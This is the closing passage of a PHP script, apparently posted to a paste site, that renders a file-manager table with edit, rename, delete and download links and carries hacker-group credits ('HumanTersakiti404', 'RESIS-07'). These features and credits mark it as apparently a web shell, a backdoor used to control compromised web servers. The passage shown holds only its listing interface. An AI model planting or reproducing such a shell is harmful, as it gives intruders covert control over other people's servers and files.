  2886. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2887. echo "<td class='td_home'><center>$ftype</center></td>";
  2888. echo "<td class='td_home'><center>$size</center></td>";
  2889. echo "<td class='td_home'><center>$ftime</center></td>";
  2890. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  2891. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2892. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2893. echo "</tr>";
  2894. }
  2895. echo "</table>";
  2896. if(!is_readable($dir)) {
  2897. //
  2898. } else {
  2899. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2900. echo "<center><font color=black>Copyright by <font color=red>HumanTersakiti404</a></center>";
  2901. echo "<center><font color=black>Recoded by <font color=red>RESIS-07</a></center>";
  2902. }
  2903. }
  2904. ?>
  2905. </html>
Add Comment
Please, Sign In to add comment